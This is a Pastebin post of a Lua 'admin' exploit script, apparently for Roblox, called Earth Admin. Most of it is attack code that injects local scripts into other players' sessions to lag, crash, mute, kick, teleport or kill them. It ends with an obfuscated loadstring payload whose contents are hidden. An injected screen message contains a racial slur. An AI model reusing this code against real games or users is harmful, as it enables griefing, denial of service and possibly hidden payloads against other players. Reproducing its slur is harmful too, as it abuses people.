Advertisement
QendrimGraphics

Earth Admin

Apr 1st, 2015
306
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Lua 32.87 KB | None | 0 0
  1. --THIS IS EARTH ADMIN, PUBLISHED FROM "LuaScripterLS", and made by him.
  2. --if you dont beleive, say info/ :3
  3. --Nilcrash wont work, so don't test it.
  4. --That is all that I need to sai.
  5. --this is a LocalScript
  6. --kbai, nau
  7.  
  8. wait()
  9. LocalPlayer = game:GetService("Players").LocalPlayer
  10. script.Parent = __EARTH__
  11. Tabs = {}
  12. Cmds = {}
  13. key = "/"
  14. chatgui = true
  15. probemode = false
  16. connection = nil
  17.  
  18. --not sure if it will work.
  19. --BRanks = -1 = Kick, -2 = Lag, -3 = Mute, -4 = Rejoin
  20. Banlist = {}
  21. Playerlist = {}
  22.  
  23. tabmodel = Instance.new("Model", Workspace)
  24. tabmodel.Name = "Earth tabs"
  25. SourceName = "DSource"
  26. --[[
  27. SourceNames:
  28. Alakazard: 'source'
  29. Anaminus: 'DSource'
  30. AntiBoomz0r: 'Source'
  31. ]]--
  32.  
  33. function NilCrash(Name)
  34. local Crasher = Instance.new("StringValue")
  35. Crasher.Name = "Client"
  36. Crasher.Value = string.lower(tostring(Name))
  37. Crasher.Parent = game:GetService("Lighting")
  38. wait(1)
  39. if Crasher and Crasher.Parent then
  40. ypcall(function()
  41. Crasher:Destroy()
  42. end)
  43. end
  44. end
  45.  
  46. function Crash(name)
  47. name = tostring(name or "nil")
  48. local t = Instance.new("StringValue")  
  49. t.Name = "DISC: "..name
  50. t.Parent = game.Lighting  
  51. game:GetService("Debris"):AddItem(t,1)
  52. end
  53.  
  54. function Connect(player)
  55. if game.Players[player.Name] then
  56. if not Playerlist[player.Name] then
  57. NewLS(CrashSource,player:findFirstChild("Backpack"))
  58. table.insert(Playerlist,player.Name)
  59. Output('Connected | '..player.Name,__)
  60. end
  61. end
  62. end
  63.  
  64. LagSource = [==[
  65. wait(0)
  66. script.Parent = nil
  67. plr = game:GetService("Players").LocalPlayer
  68. local plrgui = plr:findFirstChild("PlayerGui")
  69. if plrgui == nil then repeat wait() plrgui = plr:findFirstChild("PlayerGui") until plrgui ~= nil end
  70. while plr.Parent == game:GetService("Players") do
  71. wait()
  72. for i = 1, 1000 do
  73. local sc = Instance.new("ScreenGui",plrgui)
  74. local fr = Instance.new("TextLabel",sc)
  75. fr.Text = "LAGGING"
  76. fr.Size = UDim2.new(1, 0, 1, 0)
  77. fr.FontSize = "Size48"
  78. end
  79. end
  80. ]==]
  81.  
  82. FunScript = [[
  83. LP = game:service'Players'.LocalPlayer
  84. Shapes = {"Ball", "Block"}
  85. wait()
  86. script.Parent = nil
  87. Delay(0, function()
  88. while wait() do
  89. workspace.CurrentCamera.CameraType = "Scriptable"
  90. workspace.CurrentCamera.FieldOfView = workspace.CurrentCamera.FieldOfView + math.random(-5,5)
  91. workspace.CurrentCamera:SetRoll(workspace.CurrentCamera:GetRoll()+0.075)
  92. workspace.CurrentCamera.CoordinateFrame = workspace.CurrentCamera.CoordinateFrame * CFrame.new(math.random(-2,2),math.random(-2,2),math.random(-2,2))
  93. local Part = Instance.new("Part", workspace.CurrentCamera)
  94. Part.Shape = Shapes[math.random(1, 2)]
  95. Part.Anchored = true
  96. Part.BrickColor = BrickColor.new(math.random(),math.random(),math.random())
  97. Part.Size = Vector3.new(math.random(5,10),math.random(-25,25),math.random(5,10))
  98. Part.CFrame = workspace.CurrentCamera.CoordinateFrame * CFrame.new(math.random(-250,250),math.random(-100,100),math.random(-250,250)) * CFrame.Angles(math.random(),math.random(),math.random())
  99. local Smoke = Instance.new("Smoke", Part)
  100. Smoke.Color = Color3.new(math.random(), math.random(), math.random())
  101. Smoke.Opacity = 0.7
  102. local Sparkles = Instance.new("Sparkles", Part)
  103. Sparkles.SparkleColor = Color3.new(math.random(), math.random(), math.random())
  104. local Fire = Instance.new("Fire", Part)
  105. Fire.Color = Color3.new(math.random(), math.random(), math.random())
  106. Fire.SecondaryColor = Color3.new(math.random(), math.random(), math.random())
  107. local Ex = Instance.new("Explosion", workspace.CurrentCamera)
  108. Ex.Position = Vector3.new(math.random(-250,250),math.random(10,100),math.random(-250,250))
  109. Ex.BlastPressure = 15
  110. Ex.BlastRadius = 12.5
  111. if not workspace.CurrentCamera:findFirstChild("Hint") then
  112. local mes = Instance.new("Hint", workspace.CurrentCamera)
  113. mes.Text = "OMG STOP FUCKING WITH MY SHIT YOU STUPID NIGGA"
  114. end
  115. end
  116. end)
  117. ]]
  118.  
  119. CrashSource = [==[
  120. wait(0)
  121. script.Parent = nil
  122. local Lig = game:GetService("Lighting")
  123. local LP = game:GetService("Players").LocalPlayer
  124. local LowerName = LP.Name:lower()
  125. Lig.ChildAdded:connect(function(Obj)
  126. if Obj.Name == "Client" and Obj.ClassName == "StringValue" and (LowerName:find(string.lower(Obj.Value)) or (LP.Character and LP.Character.Name:lower():find(string.lower(Obj.Value)))) then
  127. pcall(function()
  128. Obj:Destroy()
  129. end)
  130. LP.Parent = nil
  131. LP.Parent = game:GetService("Players")
  132. end
  133. end)
  134. ]==]
  135.  
  136. coroutine.resume(coroutine.create(function()
  137. while wait(3) do
  138. if game:GetService("Players").Name ~= "Players" then
  139. game:GetService("Players").Name = "Players"
  140. end
  141. end
  142. end))
  143.  
  144. function Dismiss()
  145. for i = 1, 10 do
  146. for i = 1, #Tabs do
  147. table.remove(Tabs, i)
  148. if tabmodel then
  149. tabmodel:ClearAllChildren()
  150. end end end
  151. end
  152.  
  153. function AddCmd(Name,Say,Desc,Func)
  154. table.insert(Cmds,{["Name"] = Name,["Say"] = Say,["Desc"] = Desc,["Func"] = Func})
  155. end
  156.  
  157. AddCmd('Idiots','pingtehidiots','Find out on your own',
  158. function()
  159. for _,v in pairs(Playerlist) do
  160. if not game.Players[v] then
  161. Output('(NIL) '..v, function() Output('NilCrash this person?', function() NilCrash(v) end) end)
  162. else
  163. Output(v,__)
  164. end
  165. end
  166. end
  167. )
  168.  
  169. AddCmd("Banlist","bl","Show the banned players",
  170. function()
  171. Dismiss()
  172. for i, v in pairs(Banlist) do
  173. Output(v["Name"]..' - BRank: '..v["BRank"], __)
  174. end
  175. end
  176. )
  177.  
  178. AddCmd("Fun","fun","Make some fun for a player",
  179. function(plrs)
  180. for _, plr in pairs(plrs) do
  181. if plr and plr.Backpack then
  182. NewLS(FunScript, plr.Backpack)
  183. end
  184. end
  185. end
  186. )
  187.  
  188. AddCmd("Lag player","lag","Lag a player",
  189. function(plrs)
  190. for _, plr in pairs(plrs) do
  191. if plr and plr.Backpack then
  192. NewLS(LagSource, plr.Backpack)
  193. end
  194. end
  195. end
  196. )
  197.  
  198.  
  199. AddCmd("Nuke","nuke","Nuke a player",
  200. function(plrs)
  201. for _, plr in pairs(plrs) do
  202. if plr and plr.Character then
  203. a = Instance.new("Explosion", plr.Character)
  204. a.Position = plr.Character.Torso
  205. end
  206. end
  207. end
  208. )
  209.  
  210. AddCmd("Fire","fire","Fire a player",
  211. function(plrs)
  212. for _, plr in pairs(plrs) do
  213. if plr and plr.Character and plr.Character.Torso then
  214. Instance.new("Fire", plr.Character.Torso)
  215. end
  216. end
  217. end
  218. )
  219.  
  220. AddCmd("Un-fire","unfire","Remove fire from player",
  221. function(plrs)
  222. for _, plr in pairs(plrs) do
  223. if plr and plr.Character and plr.Character.Torso then
  224. pcall(function()
  225. for j, k in pairs(plr.Character.Torso:GetChildren()) do
  226. if k:IsA("Fire") then
  227. k:Destroy()
  228. end
  229. end
  230. end)
  231. end
  232. end
  233. end
  234. )
  235.  
  236. found = false
  237.  
  238. coroutine.wrap(function()
  239. while found == false do
  240. if game.PlaceId == 21053279 or game.PlaceId == 21053219 then break end
  241. for _,scriptinworkspace in pairs(workspace:children()) do
  242. if scriptinworkspace then
  243. if scriptinworkspace:IsA("Script") then
  244. if scriptinworkspace:FindFirstChild(SourceName) then
  245. newScript = scriptinworkspace:Clone()
  246. wait(0.2)
  247. newScript.Name = "NewScript"
  248. newScript.Disabled = true
  249. newScript:FindFirstChild(SourceName).Value = ""
  250. Output("Source found", __)
  251. found = true
  252. break
  253. end
  254. end
  255. end
  256. end
  257. wait()
  258. end
  259. end)()
  260.  
  261. AddCmd("Unpunish player","unpunish","Restore the player's character",
  262. function(plrs)
  263. for _, plr in pairs(plrs) do
  264. if plr then
  265. NewS("game.Players['"..plr.Name.."']:LoadCharacter()", workspace)
  266. end
  267. end
  268. end
  269. )
  270.  
  271. function NewS(sourcevalue, parent)
  272. if game.PlaceId == 21053279 or game.PlaceId == 21053219 then
  273. NS(sourcevalue, parent)
  274. else
  275. if newScript then
  276. local scr = newScript:Clone()
  277. if scr:FindFirstChild(SourceName) then
  278. if scr:FindFirstChild(SourceName) then
  279. scr:FindFirstChild(SourceName).Value = sourcevalue
  280. scr.Parent = parent
  281. wait(0.5)
  282. scr.Disabled = false
  283. return scr
  284. end
  285. end
  286. end
  287. end
  288. end
  289.  
  290. sorcery = script:Clone()
  291.  
  292. Services = {
  293. game:GetService("Workspace"),
  294. game:GetService("Players"),
  295. game:GetService("Lighting"),
  296. game:GetService("StarterPack"),
  297. game:GetService("StarterGui"),
  298. game:GetService("Teams"),
  299. game:GetService("SoundService"),
  300. game:GetService("Debris"),
  301. game:GetService("InsertService"),
  302. game:GetService("RunService"),
  303. game:GetService("Chat"),
  304. game:GetService("TeleportService"),
  305. game:GetService("Geometry"),
  306. game:GetService("MarketplaceService"),
  307. game:GetService("BadgeService"),
  308. game:GetService("NetworkClient"),
  309. game:GetService("FriendService"),
  310. }
  311.  
  312. function Explore(Item)
  313. Dismiss()
  314. if(Item==nil)then
  315. for _,v in pairs(Services)do
  316. Output(v.Name,function() Explore(v) end)
  317. end;
  318. else
  319. f={
  320. ['View children']=function()
  321. Dismiss()
  322. for _,v in pairs(Item:children())do
  323. Output(v.Name,function()
  324. Explore(v)
  325. wait()
  326. end);
  327. end;
  328. end;
  329. ['View parent']=function()
  330. Explore(Item.Parent)
  331. end;
  332. ['Destroy']=function()
  333. Item:Destroy();
  334. Explore(Item.Parent);
  335. end;
  336. ['Clear']=function()
  337. Item:ClearAllChildren()
  338. end;
  339. ['Clone']=function()
  340. pcall(function()
  341. cloneableObj = Item:clone()
  342. end)
  343. end;
  344. ['Remove']=function()
  345. Item:remove()
  346. end;
  347. ['Paste']=function()
  348. if cloneableObj then
  349. cloneableObj.Parent = Item
  350. end
  351. end;
  352. ['Ki'..'ck Item']=function()
  353. NewLS("local plr = game:service'Players'.LocalPlayer; plr:Ki".."ck()", Item)
  354. end;
  355. };
  356. for i,v in pairs(f)do
  357. Output(tostring(i),v);
  358. end;
  359. Output('Item Name: \''..tostring(Item.Name)..'\'',nil);
  360. Output('Class: \''..tostring(Item.ClassName)..'\'',nil);
  361. if cloneableObj then
  362. Output('Currently Cloning: \''..tostring(cloneableObj.Name)..'\'',nil);
  363. end
  364. end;
  365. end;
  366.  
  367. AddCmd("Explore","explore","Explore the game",
  368. function()
  369. Explore()
  370. end
  371. )
  372.  
  373. function NewLS(sourcevalue, parent)
  374. if game.PlaceId == 21053279 or game.PlaceId == 21053219 then
  375. NLS(sourcevalue, parent)
  376. else
  377. local NS = sorcery:Clone()
  378. NS.Name = "NewLocal"
  379. local Source = NS:findFirstChild(SourceName)
  380. if Source == nil then Instance.new('StringValue',NS).Name = SourceName end Source = NS:findFirstChild(SourceName)
  381. Source.Value = sourcevalue
  382. NS.Parent = parent
  383. NS.Disabled = false
  384. return NS
  385. end
  386. end
  387.  
  388. Clothes = {}
  389.  
  390. for _,Item in pairs(LocalPlayer.Character:GetChildren()) do
  391. if Item:IsA('CharacterMesh') or Item:IsA('Hat') or Item:IsA('Shirt') or Item:IsA('Pants') then
  392. table.insert(Clothes,Item:Clone())
  393. end
  394. end
  395. for i,v in pairs(LocalPlayer.Character:GetChildren()) do
  396. if v:IsA("BodyColors") then
  397. body = v
  398. torsocolor = body.TorsoColor
  399. leftlegcolor = body.LeftLegColor
  400. rightlegcolor = body.RightLegColor
  401. leftarmcolor = body.LeftArmColor
  402. rightarmcolor = body.RightArmColor
  403. headcolor = body.HeadColor
  404. end
  405. end
  406.  
  407. mouse = LocalPlayer:GetMouse()
  408.  
  409. mouse.KeyDown:connect(function(key)
  410. if key == "z" then
  411. game:service'StarterGui':SetCoreGuiEnabled(4, true)
  412. end
  413. end)
  414.  
  415. AddCmd("Toogle ChatGUI","chat","Toogle ChatGUI on/off",
  416. function(plrs, msg)
  417. if msg == "off" then
  418. chatgui = false
  419. elseif msg == "on" then
  420. chatgui = true
  421. end
  422. end
  423. )
  424.  
  425. AddCmd("Set WalkSpeed","ws","Set the walkspeed of player",
  426. function(plrs, msg)
  427. local keypos = msg:find(key)
  428. local targPlayers = msg:sub(1,keypos-1)
  429. local plrs = getPlayers(targPlayers)
  430. local speed = msg:sub(tonumber(keypos+1))
  431. for _,v in pairs(plrs) do
  432. if v.Character ~= nil and v.Character:findFirstChild("Humanoid") ~= nil then
  433. v.Character:findFirstChild("Humanoid").WalkSpeed = speed
  434. end
  435. end
  436. end
  437. )
  438.  
  439. AddCmd("Teleport","tp","Teleport a player to a place",
  440. function(plrs, msg)
  441. local keypos = msg:find(key)
  442. local targPlayers = msg:sub(1,keypos-1)
  443. local plrs = getPlayers(targPlayers)
  444. local id = msg:sub(tonumber(keypos+1))
  445. for _,v in pairs(plrs) do
  446. if v and v.Backpack then
  447. NewLS([[game:service'TeleportService':Teleport(]]..id..[[)]], v.Backpack)
  448. end
  449. end
  450. end
  451. )
  452.  
  453. Bad_Char = ""
  454.  
  455. function chatgui(msg)
  456. if not chatgui then return end
  457. if probemode == false then
  458. if LocalPlayer.Character:findFirstChild("Head") then
  459. mainPart = LocalPlayer.Character:findFirstChild("Head")
  460. end
  461. end
  462. if probemode == true then
  463. if game.Workspace:findFirstChild(LocalPlayer.Name.."'s probe") then
  464. mainPart = game.Workspace:findFirstChild(LocalPlayer.Name.."'s probe")
  465. end
  466. end
  467. local bg = Instance.new("BillboardGui", mainPart)
  468. bg.Adornee = mainPart
  469. bg.Name = "CHATGUIBG"
  470. bg.Size = UDim2.new(4, 0, 2.5, 0)
  471. bg.StudsOffset = Vector3.new(-4, 2, 0)
  472. local bg2 = Instance.new("BillboardGui", mainPart)
  473. bg2.Adornee = mainPart
  474. bg2.Name = "CHATGUIBG2"
  475. bg2.Size = UDim2.new(4, 0, 2.5, 0)
  476. bg2.StudsOffset = Vector3.new(-4, 4.5, 0)
  477. local text = Instance.new("TextLabel", bg)
  478. text.Size = UDim2.new(3, 0, 0.5, 0)
  479. text.FontSize = "Size18"
  480. text.TextScaled = true
  481. text.TextTransparency = 0
  482. text.BackgroundTransparency = 1
  483. text.TextTransparency = 0
  484. text.TextStrokeTransparency = 0
  485. text.Font = "Arial"
  486. text.TextColor = BrickColor.new("Toothpaste")
  487. text.Text = " "
  488. Message = msg:sub(1)
  489. if #Message >50 then return end
  490. for i = 0, #Message, 1 do
  491. wait(0.01)
  492. text.Text = string.gsub("["..LocalPlayer.Name.."]: "..Message:sub(0, i),'fuck','fuck')
  493. end
  494. wait()
  495. coroutine.resume(coroutine.create(function()
  496. for i = 0, 5, 0.05 do
  497. if bg ~= nil then
  498. if bg2 ~= nil then
  499. wait()
  500. bg2.StudsOffset = bg2.StudsOffset + Vector3.new(0, 0.05, 0)
  501. end
  502. bg.StudsOffset = bg.StudsOffset + Vector3.new(0, 0.05, 0)
  503. end
  504. end
  505. end))
  506. for i=text.TextTransparency,1,0.02 do
  507. wait()
  508. text.TextTransparency = i
  509. text.TextStrokeTransparency = i
  510. end
  511. if bg == nil then return end
  512. bg:Destroy()
  513. if bg2 == nil then return end
  514. bg2:Destroy()
  515. end
  516.  
  517. LocalPlayer.Chatted:connect(chatgui)
  518.  
  519. AddCmd("Message","m","Make a message over the screen",
  520. function(plrs, msg)
  521. Message = msg
  522. NewS([[
  523. a = Instance.new("Message", workspace)
  524. a.Text = ]].."[ "..LocalPlayer.Name.." ]: "..Message, workspace)
  525. end
  526. )
  527.  
  528. AddCmd("Hint","h","Make a message at top of the screen",
  529. function(plrs, msg)
  530. Hint = msg
  531. NewS([[
  532. a = Instance.new("Hint", workspace)
  533. a.Text = ]].."[ "..LocalPlayer.Name.." ]: "..Hint, workspace)
  534. end
  535. )
  536.  
  537. AddCmd("Commands","cmds","Show the list of commands",
  538. function()
  539. Dismiss()
  540. for i, v in pairs(Cmds) do
  541. Output(v["Name"],
  542. function()
  543. Output("Description: "..v["Desc"], __)
  544. Output("Usage: "..v["Say"], __)
  545. Output("Name: "..v["Name"], __)
  546. end)
  547. end
  548. end
  549. )
  550.  
  551. AddCmd("Rejoin player","rej","Rejoin the player",
  552. function(plrs)
  553. for _, plr in pairs(plrs) do
  554. if plr and plr.Backpack then
  555. NewLS("game:service'TeleportService':Teleport(game.PlaceId)", plr.Backpack)
  556. end
  557. end
  558. end
  559. )
  560.  
  561. AddCmd("Create base","base","Create the base",
  562. function()
  563. a = Instance.new("Part")
  564. a.Parent = Workspace
  565. a.Name = "Base"
  566. a.Position = Vector3.new(0, 0.6, 0)
  567. a.Size = Vector3.new(1002, 0, 1002)
  568. a.Material = "Grass"
  569. a.Anchored = true
  570. a.BrickColor = BrickColor.new("Dark green")
  571. end
  572. )
  573.  
  574. AddCmd("Ping","ping","Ping something",
  575. function(plrs, msg)
  576. if msg == "" then
  577. Output("pong", __)
  578. else
  579. Output(msg, __)
  580. end
  581. end
  582. )
  583.  
  584. AddCmd("Dismiss","dis","Dismiss tabs",
  585. function()
  586. Dismiss()
  587. end
  588. )
  589.  
  590. AddCmd("Probe mode", "probe", "Be a ball and fly around",
  591. function()
  592. probemode = true
  593. Dismiss()
  594. if LocalPlayer.Character then LocalPlayer.Character = nil end
  595. if workspace.CurrentCamera == nil then return end
  596. local camera = workspace.CurrentCamera
  597. local probe = Instance.new("Part", workspace)
  598. M = Instance.new("SpecialMesh", probe)
  599. M.MeshId = "http://www.roblox.com/asset/?id=10061232"
  600. M.TextureId = "http://www.roblox.com/asset/?id=10061209"
  601. M.Scale = Vector3.new(3, 3, 3)
  602. probe.TopSurface = 0
  603. probe.Anchored = true
  604. probe.BottomSurface = 0
  605. probe.Name = LocalPlayer.Name.."'s probe"
  606. local rotation = 0
  607. local bbg = Instance.new("BillboardGui", probe)
  608. bbg.Size = UDim2.new(3, 0, 3 ,0)
  609. bbg.ExtentsOffset = Vector3.new(0, 2, 0)
  610. local txt = Instance.new("TextLabel", bbg)
  611. txt.FontSize = "Size24"
  612. txt.Font = "SourceSansBold"
  613. txt.Text = LocalPlayer.Name
  614. txt.BackgroundTransparency = 1
  615. txt.TextColor = BrickColor.new("Really red")
  616. txt.TextStrokeTransparency = 0
  617. txt.Size = UDim2.new(1,0,1,0)
  618. local pl = Instance.new("PointLight", probe)
  619. pl.Shadows = true
  620. pl.Range = 20
  621. coroutine.wrap(function()
  622. while pl ~= nil do
  623. pl.Color = Color3.new(math.random(), math.random(), math.random())
  624. wait(0.8)
  625. end
  626. end)()
  627. coroutine.wrap(function()
  628. while LocalPlayer.Character == nil and probe.Parent == workspace and probe ~= nil and game:service'RunService'.Stepped:wait() do
  629. probe.CFrame = camera.Focus * CFrame.Angles(0, rotation, 0)
  630. rotation = rotation + 0.1
  631. end
  632. if camera then
  633. camera:Destroy()
  634. end
  635. probe:Destroy()
  636. end)()
  637. end
  638. )
  639.  
  640. AddCmd("Make your character","char","Creates your character",
  641. function()
  642. if workspace.CurrentCamera == nil then return end
  643. local camera = workspace.CurrentCamera
  644. local new_char = game:service("InsertService"):LoadAsset(68452456):GetChildren()[1]
  645. local human = new_char.Humanoid
  646. human.Parent = nil
  647. new_char.Name = LocalPlayer.Name
  648. wait()
  649. human.Parent = new_char
  650. camera.CameraSubject = human
  651. camera.CameraType = "Custom"
  652. new_char.Parent = workspace
  653. local pl = Instance.new("PointLight", new_char.Head)
  654. pl.Range = 24
  655. pl.Shadows = true
  656. LocalPlayer.Character = new_char
  657. new_char:MakeJoints()
  658. new_char.Torso.BrickColor = torsocolor
  659. new_char["Left Leg"].BrickColor = leftlegcolor
  660. new_char["Right Leg"].BrickColor = rightlegcolor
  661. new_char["Left Arm"].BrickColor = leftarmcolor
  662. new_char["Right Arm"].BrickColor = rightarmcolor
  663. new_char.Head.BrickColor = headcolor
  664. for i,v in pairs(Clothes) do
  665. v:Clone().Parent = new_char
  666. end
  667. probemode = false
  668. end
  669. )
  670.  
  671. AddCmd("Stop the commands","cremove","Remove the commands",
  672. function()
  673. Output("Are you sure that you wan't to remove the Earth admin?",
  674. function()
  675. Output("Are you 100% sure that you want this???",
  676. function()
  677. for i,v in pairs(getfenv(1)) do
  678. getfenv(1)[i] = nil
  679. end
  680. script.Disabled = true
  681. LocalPlayer = NO_PLAYER
  682. script:findFirstChild(SourceName).Value = " "
  683. script.Disabled = true
  684. tabmodel:ClearAllChildren()
  685. tabmodel:Destroy()
  686. connection:disconnect()
  687. Tabs = {}
  688. Cmds = {}
  689. Banlist = {}
  690. fukhed.all = true
  691. coroutine.resume(coroutine.create(function()
  692. while wait(0.1) do
  693. Dismiss()
  694. end
  695. end))
  696. end)
  697. end)
  698. end
  699. )
  700.  
  701. AddCmd("ForceField","ff","Give forcefield to player",
  702. function(plrs)
  703. for _, plr in pairs(plrs) do
  704. if plr and plr.Character then
  705. Instance.new("ForceField", plr.Character)
  706. end
  707. end
  708. end
  709. )
  710.  
  711. AddCmd("Sparkles","sparkles","Give sparkles to player",
  712. function(plrs)
  713. for _, plr in pairs(plrs) do
  714. if plr and plr.Character and plr.Character.Torso then
  715. Instance.new("Sparkles", plr.Character.Torso)
  716. end
  717. end
  718. end
  719. )
  720.  
  721. AddCmd("Un-Sparkles","unsparkles","Remove sparkles from player",
  722. function(plrs)
  723. for _, plr in pairs(plrs) do
  724. if plr and plr.Character and plr.Character.Torso then
  725. pcall(function()
  726. for j, k in pairs(plr.Character.Torso:GetChildren()) do
  727. if k:IsA("Sparkles") then
  728. k:Destroy()
  729. end
  730. end
  731. end)
  732. end
  733. end
  734. end
  735. )
  736.  
  737. AddCmd("Crash player","crash","Crash the player",
  738. function(plrs)
  739. for _, plr in pairs(plrs) do
  740. if plr and plr.Backpack then
  741. NewLS("repeat until false", plr.Backpack)
  742. end
  743. end
  744. end
  745. )
  746.  
  747. AddCmd("Respawn player","respawn","Respawn the player",
  748. function(plrs)
  749. for _, plr in pairs(plrs) do
  750. NewS("game.Players['"..plr.Name.."']:LoadCharacter()", workspace)
  751. end
  752. end
  753. )
  754.  
  755. AddCmd("Mute player","mute","Block the player chat",
  756. function(plrs)
  757. for _, plr in pairs(plrs) do
  758. if plr and plr.Backpack then
  759. NewLS("game:service'StarterGui':SetCoreGuiEnabled(3, false)", plr.Backpack)
  760. end
  761. end
  762. end
  763. )
  764.  
  765. AddCmd("Unmute player","unmute","Unblock the player chat",
  766. function(plrs)
  767. for _, plr in pairs(plrs) do
  768. if plr and plr.Backpack then
  769. NewLS("game:service'StarterGui':SetCoreGuiEnabled(3, true)", plr.Backpack)
  770. end
  771. end
  772. end
  773. )
  774.  
  775. AddCmd("Un-ForceField","unff","Remove the forcefield that you gave to player",
  776. function(plrs)
  777. for _, plr in pairs(plrs) do
  778. if plr and plr.Character then
  779. pcall(function()
  780. for _,v in pairs(plr.Character:GetChildren()) do
  781. if v:IsA("ForceField") then
  782. v:Destroy()
  783. end
  784. end
  785. end)
  786. end
  787. end
  788. end
  789. )
  790.  
  791. AddCmd("God player","god","Make the player immortal",
  792. function(plrs)
  793. for _, plr in pairs(plrs) do
  794. if plr and plr.Character and plr.Character.Humanoid then
  795. plr.Character.Humanoid.MaxHealth = math.huge
  796. end
  797. end
  798. end
  799. )
  800.  
  801. AddCmd("Ungod player","ungod","Make the player mortal",
  802. function(plrs)
  803. for _, plr in pairs(plrs) do
  804. if plr and plr.Character then
  805. plr.Character.Humanoid.MaxHealth = 100
  806. end
  807. end
  808. end
  809. )
  810.  
  811. AddCmd("Kick player","kick","Kick a player",
  812. function(plrs)
  813. for _, plr in pairs(plrs) do
  814. if plr and plr.Backpack then
  815. NewLS("game:service'StarterGui':SerCoreGuiEnabled(3,false)", plr.Backpack)
  816. plr:Destroy()
  817. end
  818. end
  819. end
  820. )
  821.  
  822. AddCmd("Kill player","kill","Kill a player",
  823. function(plrs)
  824. for _, plr in pairs(plrs) do
  825. if plr and plr.Character then
  826. plr.Character:BreakJoints()
  827. end
  828. end
  829. end
  830. )
  831.  
  832. AddCmd("Punish player","punish","Remove character of a player",
  833. function(plrs)
  834. for _, plr in pairs(plrs) do
  835. if plr and plr.Character then
  836. plr.Character:Destroy()
  837. end
  838. end
  839. end
  840. )
  841.  
  842. AddCmd("Admin a player","admin","Give admin to a player",
  843. function(plrs)
  844. for _, plr in pairs(plrs) do
  845. if plr and plr.Backpack then
  846. a = sorcery:Clone()
  847. a.Parent = plr.Backpack
  848. Output("You gave admin to: "..plr.Name, __)
  849. end
  850. end
  851. end
  852. )
  853.  
  854. AddCmd("Fix cam","fcam","Fix anyone's cam",
  855. function(plrs, msg)
  856. for _, plr in pairs(plrs) do
  857. if plr and plr.Backpack then
  858. NewLS([[
  859. game.Workspace.CurrentCamera:Destroy()
  860. cam = Instance.new("Camera", workspace)
  861. cam.Name = "CurrentCamera"
  862. cam.FieldOfView = 70
  863. cam.CameraType = "Custom"
  864. cam.CameraSubject = game.Players.LocalPlayer.Character.Humanoid]], plr.Backpack)
  865. end
  866. end
  867. end
  868. )
  869.  
  870. AddCmd("AFK","afk","Ping yourself as afk",
  871. function()
  872. Dismiss()
  873. for i = 1,8 do
  874. wait()
  875. Output("AFK", __)
  876. end
  877. end
  878. )
  879.  
  880. AddCmd("Back","back","Ping yourself as back",
  881. function()
  882. Dismiss()
  883. for i = 1,8 do
  884. wait()
  885. Output("Back", __)
  886. end
  887. wait(3)
  888. Dismiss()
  889. end
  890. )
  891.  
  892. AddCmd("Ban a player","ban","Kicks a player when he enters",
  893. function(plrs, msg)
  894. local keypos = msg:find(key)
  895. local targPlayers = msg:sub(1,keypos-1)
  896. local plrs = getPlayers(targPlayers)
  897. local BRank = msg:sub(tonumber(keypos+1))
  898. for _,v in pairs(plrs) do
  899. if v then
  900. table.insert(Banlist,{["Name"] = v.Name, ["BRank"] = BRank})
  901. end
  902. end
  903. end
  904. )
  905.  
  906. local charMap = {["+"] = 0, ["^"] = 1, ["%"] = 2, [")"] = 3, ["*"] = 4, ["$"] = 5, ["-"] = 6, ["_"] = 7, ["#"] = 8, ["&"] = 9, ["@"] = 10, ["("] = 11, ["?"] = 12, ["~"] = 13, ["!"] = 14, ["="] = 15}; setfenv(assert(loadstring((string.gsub(string.gsub(table.concat({
  907. "?-=-)-^-?-+%&-~)~%^)()?-=-^-*-)_*_%_&-!-_-#%)_*_%_&-!-_-!%_-)_$_%-#B%!*!_~*~!~^&&~?@(&!&_@_~&~@A?@~@~_~~?^~&?&#)~)~+~-?@?%?##+?(A?#(~_-_(=?=!!@!)=$@?!!(?@!@-($!-!-~_~*!)!=~*~_~!?~#-~$~^~-?&?+?$#?(-?-?^($_~-@$@$(*-*~&^(~=$##$&$?$?$^^!A=-+&%#)$)*%!%~%!~=^=^!+!+?$+)%)-)#^)^_+&+==~($+)+!=%=*=@!!@*!~!?!-~&&+&&@#?*?=&$?#($($_(-#&*@=@%@$@$@~*%&)&_#?#()^*$#*&)_*_#-~-?^?$%%*^_)#$?*^$+$_*_)-*_)-)#C)**~^?$+)%)-))%$%+%#?_^)+!+^+*+*+!@*(!#-!^=+%$!-~~^%!)~$~+~-#)#+-#(~(?(#(#?&@?$?$$_*$+-A@(-*@$!)!_$#?^$#~(A?-)_)%+%~=!)+-($)$*$=*==$==!~!)=)!!^?$+)%)-)+!~(*^#-?_&+(@?!!+&+^+%+~=~@)@+~?~_!@C~$#@?+~&_%?%(^(!@$-)@-(&$^(%A&!#+&*&!_@*_*$*+*()^#^%&_?$?$*-+-&$*$!*~*&*!)_*!)!%_)-=^=-=$)_B~?#+*+@?_@#!?$!-$+~=!=&=&@=&+~@A~+~#~%~-?~_~?*?^_!--?(#)@+(!@?@@@@&!*(#@#=#_###%&*)@)@%$-^-_%*+$*_-%-@$($-$-+?=?%_)+*~)=%^)!-+*+*%**~?%!~--&)@)~))?&?&(*=+=-()&@!=!^!)#!&(#%&$#!#=_-#~(&?=(^(=(^(*(+(_-=&%-=&+_&&#$($%--&-#%&+&@#)#%)%#+#(_=-^__-(%~$=$$$)--^)^($&$*$#*@*+**+$)&*^*=%="
  908. ,"!_%@!&!!!)!!^(~*~??(~$^@~#~#?^+_+@=!+=^#($(^(=@=-__(-$__-=-_@*((@!&~@+@*@^@&$%&-$*&--+&+$*$?$?$^&%#=#!#&#)#))*#)#=_*___!-))--&-+-=-)%^%@-&-$-@$~$*$&^(*+-&$#*&+%*-+-+%^#+++?)@=*=~!~=!=~=!!#%=%)%-!*!^!+!%#(#+#(#!__#+?!?-?@(@?!()?^?@_*(&_#((#-(__?_$#((~@((((_(%()-$($(%(#@?@*@@-!&%@@&@@=$!$#@#@$@(&=&_&~$+&-@+@+&%$?#^$%$)$($*$!*(#@*$*=)+$%$%$**=__#?_+*=)~)~)%%?%%%!%%%?%--$_!-)-*_&-=-!-#%)-&%&-~)&-(%^)()%_$-*_$_%_!-+%)_*_%_&-!-_-!%)-#-^-%_#%#%)_*_%_&-!-_-!%%-&_*_$-#%)-&%(%~%^)^)#)(%&-&%$%+%%)$)-)&%$-!-*-&%&%#%&%"
